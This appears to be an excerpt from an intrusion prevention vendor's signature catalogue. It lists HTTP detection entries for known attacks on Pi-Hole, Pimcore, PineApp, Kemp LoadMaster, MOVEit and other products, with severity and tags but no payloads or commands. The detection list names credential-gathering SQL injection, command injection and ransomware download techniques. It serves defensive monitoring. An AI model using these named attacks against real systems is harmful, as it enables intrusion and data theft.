HTTP_CRL-PHPWAY-Link-Management-Script-Page-To-Include-Remote-File-Inclusion

About this situation: Detected an attempt to exploit a file inclusion vulnerbility in PHPWAY Link Management Script
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, PHPWAY Link Management Script, CVE2008, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-201-2032
Last changed: sgpkg-ips-1607-5242
Vulnerability: PHPWAY-Link-Management-Script-Multiple-File-Inclusion-Vulnerabilities
Description:
Back to top

HTTP_CRL-Phpwiki-Ploticus-Remote-Code-Execution

About this situation: An attempt to exploit a Phpwiki Ploticus Remote Code Execution vulnerability detected.
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Phpwiki Ploticus, CVE2014, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-697-5211
Last changed: sgpkg-ips-697-5211
Vulnerability: Phpwiki-Ploticus-Remote-Code-Execution
Description:
Back to top

HTTP_CRL-Pi-Hole-Blocklist-OS-Command-Execution

About this situation: An attempt to exploit a vulnerability in Pi-Hole detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Pihole, CVE2020, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1254-5242
Last changed: sgpkg-ips-1254-5242
Vulnerability: Pi-Hole-Blocklist-OS-Command-Execution
Description:
Back to top

HTTP_CRL-Pi-Hole-DHCP-Mac-OS-Command-Execution

About this situation: An attempt to exploit a vulnerability in Pi-Hole detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Unix, Any Hardware, Pihole, CVE2020, Unix not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1254-5242
Last changed: sgpkg-ips-1254-5242
Vulnerability: Pi-Hole-DHCP-Mac-OS-Command-Execution
Description:
Back to top

HTTP_CRL-Pi-Hole-Whitelist-OS-Command-Execution

About this situation: An attempt to exploit a vulnerability in Pi-Hole detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Linux, Any Hardware, Pihole, Linux not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1344-5242
Last changed: sgpkg-ips-1344-5242
Vulnerability: Pi-Hole-Whitelist-OS-Command-Execution
Description:
Back to top

HTTP_CRL-PicoFlat-Pagina-Parameter-File-Inclusion

About this situation: Detected an attempt to exploit a file inclusion vulnerability in PicoFlat
Context: HTTP Normalized Request-Line
Severity: 10
Tags: Any Operating System, Any Hardware, PicoFlat, CVE2007, Any Operating System not specific, Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-196-2032
Last changed: sgpkg-ips-1607-5242
Vulnerability: PicoFlat-Pagina-Parameter-File-Inclusion
Description:
Back to top

HTTP_CRL-Pihole-Blocklist-Exec-CVE-2020-11108

About this situation: Pihole Blocklist Exec
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Linux, Any Hardware, Pihole, CVE2020, Linux not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1254-5242
Last changed: sgpkg-ips-1254-5242
Vulnerability: Pihole-Blocklist-Exec-CVE-2020-11108
Description:
Back to top

HTTP_CRL-Pimcore-Gridhelperservice-SQL-Injection

About this situation: An attempt to exploit a vulnerability in Pimcore detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Pimcore, CVE2022, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1470-5242
Last changed: sgpkg-ips-1470-5242
Vulnerability: Pimcore-Gridhelperservice-SQL-Injection
Description:
Back to top

HTTP_CRL-Pimcore-Gridhelperservice.php-Preparelistingforgrid-SQL-Injection

About this situation: An attempt to exploit a vulnerability in Pimcore Pimcore detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Pimcore, CVE2023, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1642-5242
Last changed: sgpkg-ips-1642-5242
Vulnerability: Pimcore-Gridhelperservice.php-Preparelistingforgrid-SQL-Injection
Description:
Back to top

HTTP_CRL-Pimcore-Title-Field-Stored-Cross-Site-Scripting

About this situation: An attempt to exploit a vulnerability in Pimcore Pimcore detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Pimcore, CVE2022, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1451-5242
Last changed: sgpkg-ips-1451-5242
Vulnerability: Pimcore-Title-Field-Stored-Cross-Site-Scripting
Description:
Back to top

HTTP_CRL-Pimcore-Unserialize-RCE

About this situation: An attempt to exploit a vulnerability in Pimcore detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Pimcore, CVE2019, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1196-5242
Last changed: sgpkg-ips-1196-5242
Vulnerability: Pimcore-Unserialize-RCE
Description:
Back to top

HTTP_CRL-Pineapp-Mail-Secure-Conflivelog.pl-Command-Injection

About this situation: An attempt to exploit a vulnerability in PineApp Mail-SeCure detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, PineApp Mail-SeCure, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-541-5211
Last changed: sgpkg-ips-926-5242
Vulnerability: Pineapp-Mail-Secure-Conflivelog.pl-Command-Injection
Description:
Back to top

HTTP_CRL-Pineapp-Mail-Secure-Confpremenu.php-Export-Log-Command-Injection

About this situation: An attempt to exploit a vulnerability in PineApp Mail-SeCure detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, PineApp Mail-SeCure, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-539-5211
Last changed: sgpkg-ips-926-5242
Vulnerability: Pineapp-Mail-Secure-Confpremenu.php-Export-Log-Command-Injection
Description:
Back to top

HTTP_CRL-Pineapp-Mail-Secure-Confpremenu.php-Install-License-Command-Injection

About this situation: An attempt to exploit a vulnerability in PineApp Mail-SeCure detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, PineApp Mail-SeCure, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-541-5211
Last changed: sgpkg-ips-926-5242
Vulnerability: Pineapp-Mail-Secure-Confpremenu.php-Install-License-Command-Injection
Description:
Back to top

HTTP_CRL-Pineapp-Mail-Secure-Livelog-Command-Injection

About this situation: An attempt to exploit a vulnerability in PineApp Mail-SeCure detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, PineApp Mail-SeCure, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-544-5211
Last changed: sgpkg-ips-1232-5242
Vulnerability: Pineapp-Mail-Secure-Livelog-Command-Injection
Description:
Back to top

HTTP_CRL-Pineapp-Mail-Secure-Test_li_connection.php-Command-Injection

About this situation: An attempt to exploit a vulnerability in PineApp Mail-SeCure detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, PineApp Mail-SeCure, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1453-5242
Last changed: sgpkg-ips-1453-5242
Vulnerability: Pineapp-Mail-Secure-Test_li_connection.php-Command-Injection
Description:
Back to top

HTTP_CRL-Pinkslip-Bot-Traffic

About this situation: PinkSlip bot traffic detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Botnet, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-616-5211
Last changed: sgpkg-ips-616-5211
Vulnerability: Pinkslip-Bot
Description:
Back to top

HTTP_CRL-Pinkslipbot-Trojan

About this situation: Pinkslipbot trojan related network traffic detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Potential Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-310-4219
Last changed: sgpkg-ips-310-4219
Vulnerability: Pinkslipbot-Trojan
Description:
Back to top

HTTP_CRL-Pivotal-Spring-Framework-Iswritableproperty-Spel-Injection

About this situation: An attempt to exploit a vulnerability in Pivotal Spring Data Commons detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Pivotal Spring, CVE2018, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1105-5242
Last changed: sgpkg-ips-1105-5242
Vulnerability: Pivotal-Spring-Framework-Iswritableproperty-Spel-Injection
Description:
Back to top

HTTP_CRL-Pivotal-Spring-Security-oauth-SpelView-Code-Execution

About this situation: An attempt to exploit a vulnerability in Pivotal-Spring-Security
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, CVE2016, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-813-5242
Last changed: sgpkg-ips-813-5242
Vulnerability: Pivotal-Spring-Security-oauth-SpelView-Code-Execution
Description:
Back to top

HTTP_CRL-Piwigo-CVE-2023-26876-Gather-Credentials-Via-SQL-Injection

About this situation: An attempt to exploit a vulnerability in Piwigo detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Piwigo, CVE2023, Any Operating System not specific, Suspected Disclosure, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1625-5242
Last changed: sgpkg-ips-1625-5242
Vulnerability: Piwigo-CVE-2023-26876-Gather-Credentials-Via-SQL-Injection
Description:
Back to top

HTTP_CRL-PlaySMS-Unauthenticated-Template-Injection-Code-Execution

About this situation: An attempt to exploit a vulnerability in PlaySMS detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Windows, Unix, Linux, Any Hardware, PlaySMS, CVE2020, Windows not specific, Unix not specific, Linux not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1248-5242
Last changed: sgpkg-ips-1834-5242
Vulnerability: PlaySMS-Unauthenticated-Template-Injection-Code-Execution
Description:
Back to top

HTTP_CRL-Plixer-Scrutinizer-Authentication-Bypass

About this situation: An attempt to exploit a Plixer Scrutinizer Authentication Bypass vulnerability detected.
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Plixer, CVE2012, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-709-5211
Last changed: sgpkg-ips-709-5211
Vulnerability: Plixer-Scrutinizer-Authentication-Bypass
Description:
Back to top

HTTP_CRL-Plusmail-New-Login-Attempt

About this situation: New Login attempt in plusmail
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, PowerScripts PlusMail WebConsole, CVE2000, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-867-5242
Vulnerability: HTTP-Plusmail-Cmd-Exec
Description:
Back to top

HTTP_CRL-PmWiki-Remote-PHP-Code-Injection

About this situation: An attempt to exploit a PmWiki Remote PHP Code Injection vulnerability detected.
Context: HTTP Normalized Request-Line
Severity: 10
Tags: Any Operating System, Any Hardware, PmWiki, CVE2011, Any Operating System not specific, Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-712-5211
Last changed: sgpkg-ips-1014-5242
Vulnerability: PmWiki-Remote-PHP-Code-Injection
Description:
Back to top

HTTP_CRL-PolarBear-CMS-PHP-File-Upload

About this situation: An attempt to exploit a PolarBear CMS PHP File Upload vulnerability detected.
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, PolarBear CMS, CVE2013, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-782-5211
Last changed: sgpkg-ips-782-5211
Vulnerability: PolarBear-CMS-PHP-File-Upload
Description:
Back to top

HTTP_CRL-Pontoeb.A-Traffic

About this situation: A suspicious traffic pattern detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Botnet, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-693-5211
Last changed: sgpkg-ips-693-5211
Vulnerability: Win32.Backdoor.Pontoeb.A-Botnet
Description:
Back to top

HTTP_CRL-Possible-Cross-Site-Scripting-Attempt

About this situation: A possible cross site scripting attempt detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-477-5211
Last changed: sgpkg-ips-1008-5242
Vulnerability: HTTP-Possible-Cross-Site-Scripting
Description:
Back to top

HTTP_CRL-Possible-Cross-Site-Scripting-Attempt-2

About this situation: A possible cross site scripting attempt detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-481-5211
Last changed: sgpkg-ips-768-5211
Vulnerability: HTTP-Possible-Cross-Site-Scripting
Description:
Back to top

HTTP_CRL-Possible-Cross-Site-Scripting-With-Body-Onload

About this situation: Detects potentially malicious request
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-483-5211
Last changed: sgpkg-ips-483-5211
Vulnerability: HTTP-Possible-Cross-Site-Scripting
Description:
Back to top

HTTP_CRL-Possible-Cross-Site-Scripting-With-JavaScript

About this situation: Detects potentially malicious request
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-483-5211
Last changed: sgpkg-ips-483-5211
Vulnerability: HTTP-Possible-Cross-Site-Scripting
Description:
Back to top

HTTP_CRL-Possible-Cross-Site-Scripting-With-Onmouseover

About this situation: Detects potentially malicious request
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-483-5211
Last changed: sgpkg-ips-483-5211
Vulnerability: HTTP-Possible-Cross-Site-Scripting
Description:
Back to top

HTTP_CRL-Possible-Evasion-In-SQL-Injection

About this situation: SQL comment in HTTP request parameter detected - possible evasion in SQL injection
Context: HTTP Normalized Request-Line
Severity: 2
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Possibly Unwanted Content, TCP Client Traffic
First detected in: sgpkg-ips-242-3038
Last changed: sgpkg-ips-1008-5242
Vulnerability: SQL-Injection
Evasion-In-SQL-Injection
Description:
Back to top

HTTP_CRL-Possible-Full-Width-And-Half-Width-Unicode-Encoding-Evasion

About this situation: An attempt to exploit a unicode vulnerability was detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-632-5211
Last changed: sgpkg-ips-632-5211
Vulnerability: Full-Width-And-Half-Width-Unicode-Encoding-Evasion
Description:
Back to top

HTTP_CRL-Possible-LOIC-Request

About this situation: HTTP request possibly sent by LOIC tool detected
Context: HTTP Normalized Request-Line
Severity: 2
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Potential Denial of Service, TCP Client Traffic
First detected in: sgpkg-ips-493-5211
Last changed: sgpkg-ips-510-5211
Vulnerability: LOIC-DoS-Tool
Description:
Back to top

HTTP_CRL-Possible-Netstat-Command-Usage

About this situation: Possible netstat command usage detected
Context: HTTP Normalized Request-Line
Severity: 2
Tags: Windows, Any Hardware, Windows not specific, Potential Disclosure, TCP Client Traffic
First detected in: sgpkg-ips-448-4219
Last changed: sgpkg-ips-1008-5242
Vulnerability: System-Command-Usage
Description:
Back to top

HTTP_CRL-Possible-Ping-Command-Usage

About this situation: Possible ping command usage detected
Context: HTTP Normalized Request-Line
Severity: 2
Tags: Windows, Any Hardware, Windows not specific, Potential Disclosure, TCP Client Traffic
First detected in: sgpkg-ips-448-4219
Last changed: sgpkg-ips-1008-5242
Vulnerability: System-Command-Usage
Description:
Back to top

HTTP_CRL-Possible-Redirect-Attempt

About this situation: Possible redirection attempt
Context: HTTP Normalized Request-Line
Severity: 1
Tags: Any Operating System, Any Hardware, Any Software, Any Operating System not specific, Any Software not specific, Protocol Information, TCP Client Traffic
First detected in: sgpkg-ips-481-5211
Last changed: sgpkg-ips-481-5211
Description:
Back to top

HTTP_CRL-Possible-Satan-Ransomware-File-Download

About this situation: A request resembling a Satan ransomware file download detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1062-5242
Last changed: sgpkg-ips-1062-5242
Vulnerability: Satan-Ransomware
Description:
Back to top

HTTP_CRL-Possible-Script-In-Get-Request

About this situation: Detects scripts within request lines
Context: HTTP Normalized Request-Line
Severity: 2
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Possibly Unwanted Content, TCP Client Traffic
First detected in: sgpkg-ips-183-2032
Last changed: sgpkg-ips-440-4219
Vulnerability: HTTP-Php-Phpinfo-XSS
HTTP-Possible-Cross-Site-Scripting
Description:
Back to top

HTTP_CRL-Possible-Script-In-Request

About this situation: Detects scripts within request lines
Context: HTTP Normalized Request-Line
Severity: 2
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Possibly Unwanted Content, TCP Client Traffic
First detected in: sgpkg-ips-183-2032
Last changed: sgpkg-ips-477-5211
Vulnerability: HTTP-Php-Phpinfo-XSS
HTTP-Possible-Cross-Site-Scripting
Description:
Back to top

HTTP_CRL-Possible-Script-Injection

About this situation: Possible Script Injection
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-442-4219
Last changed: sgpkg-ips-925-5242
Description:
Back to top

HTTP_CRL-Possible-SQL-Injection

About this situation: Possible SQL injection detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-242-3038
Last changed: sgpkg-ips-1008-5242
Vulnerability: SQL-Injection
Description:
Back to top

HTTP_CRL-Possible-SQL-Injection-2

About this situation: Possible SQL Injection detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-786-5211
Last changed: sgpkg-ips-786-5211
Vulnerability: SQL-Injection
Description:
Back to top

HTTP_CRL-Possible-SQL-Injection-BENCHMARK

About this situation: Possible SQL injection detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, MySQL, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-441-4219
Last changed: sgpkg-ips-566-5211
Vulnerability: SQL-Injection
Description:
Back to top

HTTP_CRL-Possible-SQL-Injection-InformationSchema

About this situation: Possible SQL injection detected
Context: HTTP Normalized Request-Line
Severity: 2
Tags: Any Operating System, Any Hardware, MySQL, Any Operating System not specific, Potential Disclosure, TCP Client Traffic
First detected in: sgpkg-ips-441-4219
Last changed: sgpkg-ips-441-4219
Vulnerability: SQL-Injection
Description:
Back to top

HTTP_CRL-Possible-SQL-Injection-INTO-OUTFILE

About this situation: Possible SQL injection detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, MySQL, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-441-4219
Last changed: sgpkg-ips-441-4219
Vulnerability: SQL-Injection
Description:
Back to top

HTTP_CRL-Possible-SQL-Injection-LoadFile

About this situation: Possible SQL injection detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, MySQL, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-441-4219
Last changed: sgpkg-ips-441-4219
Vulnerability: SQL-Injection
Description:
Back to top

HTTP_CRL-Possible-SQL-Injection-PgSleep

About this situation: Possible SQL injection detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, PostgreSQL, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-441-4219
Last changed: sgpkg-ips-441-4219
Vulnerability: SQL-Injection
Description:
Back to top

HTTP_CRL-Possible-SQL-Injection-WAITFOR-DELAY

About this situation: Possible SQL injection detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Microsoft SQL Server, Any Operating System not specific, Microsoft SQL Server not specific, Potential Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-441-4219
Last changed: sgpkg-ips-441-4219
Vulnerability: SQL-Injection
Description:
Back to top

HTTP_CRL-Possible-SQL-Version-Query

About this situation: Possible SQL injection detected
Context: HTTP Normalized Request-Line
Severity: 2
Tags: Any Operating System, Any Hardware, Microsoft SQL Server, Any Operating System not specific, Microsoft SQL Server not specific, Potential Disclosure, TCP Client Traffic
First detected in: sgpkg-ips-441-4219
Last changed: sgpkg-ips-867-5242
Vulnerability: SQL-Injection
Description:
Back to top

HTTP_CRL-Possible-W2B-Banking-SQL-Injection

About this situation: Possible SQL injection detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, W2B Online Banking, CVE2007, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-278-4219
Last changed: sgpkg-ips-991-5242
Vulnerability: W2B-Online-Banking-SQL-Injection-Vulnerability
Description:
Back to top

HTTP_CRL-Potential-Apache-Ofbiz-Unauthenticated-Endpoint-Code-Execution-CVE-2024-45195

About this situation: An attempt to exploit a vulnerability in Apache OFBiz detected
Context: HTTP Request URI
Severity: 7
Tags: Windows, Linux, Any Hardware, Apache Software Foundation OFBiz, CVE2024, Windows not specific, Linux not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1774-5242
Last changed: sgpkg-ips-1774-5242
Vulnerability: Apache-Ofbiz-Unauthenticated-Endpoint-Code-Execution-CVE-2024-45195
Description:
Back to top

HTTP_CRL-Progress-Flowmon-Command-Injection-CVE-2024-2389

About this situation: An attempt to exploit a vulnerability in Progress Flowmon detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Progress Flowmon, CVE2024, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1719-5242
Last changed: sgpkg-ips-1732-5242
Vulnerability: Progress-Flowmon-Command-Injection-CVE-2024-2389
Description:
Back to top

HTTP_CRL-Progress-Kemp-Loadmaster-Addselectedrs-And-Addselectedvs-Command-Injection

About this situation: An attempt to exploit a vulnerability in Progress Software Kemp LoadMaster detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Progress Software Kemp LoadMaster, CVE2024, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1733-5242
Last changed: sgpkg-ips-1733-5242
Vulnerability: Progress-Kemp-Loadmaster-Addselectedrs-And-Addselectedvs-Command-Injection
Description:
Back to top

HTTP_CRL-Progress-Kemp-Loadmaster-Logging-Command-Injection-CVE-2024-56131

About this situation: An attempt to exploit a vulnerability in Progress Software Kemp LoadMaster detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Progress Software Kemp LoadMaster, CVE2024, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1848-5242
Last changed: sgpkg-ips-1848-5242
Vulnerability: Progress-Kemp-Loadmaster-Logging-Command-Injection-CVE-2024-56131
Description:
Back to top

HTTP_CRL-Progress-Kemp-Loadmaster-Mangle-Stack-Based-Buffer-Overflow-CVE-2025-1758

About this situation: An attempt to exploit a vulnerability in Progress Software Kemp LoadMaster detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Progress Software Kemp LoadMaster, CVE2025, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1866-5242
Last changed: sgpkg-ips-1866-5242
Vulnerability: Progress-Kemp-Loadmaster-Mangle-Stack-Based-Buffer-Overflow-CVE-2025-1758
Description:
Back to top

HTTP_CRL-Progress-Kemp-Loadmaster-Read_Pass-Command-Injection

About this situation: An attempt to exploit a vulnerability in Progress Software Kemp LoadMaster
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Progress Software Kemp LoadMaster, CVE2024, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1795-5242
Last changed: sgpkg-ips-1795-5242
Vulnerability: Progress-Kemp-Loadmaster-Read_Pass-Command-Injection
Description:
Back to top

HTTP_CRL-Progress-Kemp-Loadmaster-Rest-API-Command-Injection

About this situation: An attempt to exploit a vulnerability in Progress Kemp LoadMaster detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Progress Software Kemp LoadMaster, CVE2024, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1720-5242
Last changed: sgpkg-ips-1754-5242
Vulnerability: Progress-Kemp-Loadmaster-Rest-API-Command-Injection
Description:
Back to top

HTTP_CRL-Progress-MOVEit-Authentication-Bypass-CVE-2024-5806

About this situation: An attempt to exploit a vulnerability in MOVEit detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, MOVEit, CVE2024, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1745-5242
Last changed: sgpkg-ips-1749-5242
Vulnerability: Progress-MOVEit-Authentication-Bypass-CVE-2024-5806
Description:
Back to top

HTTP_CRL-Progress-MOVEit-Externaltokenauthenticator-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in Progress Software MOVEit Transfer detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, MOVEit, CVE2023, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1614-5242
Last changed: sgpkg-ips-1614-5242
Vulnerability: Progress-MOVEit-Externaltokenauthenticator-Denial-Of-Service
Description:
Back to top

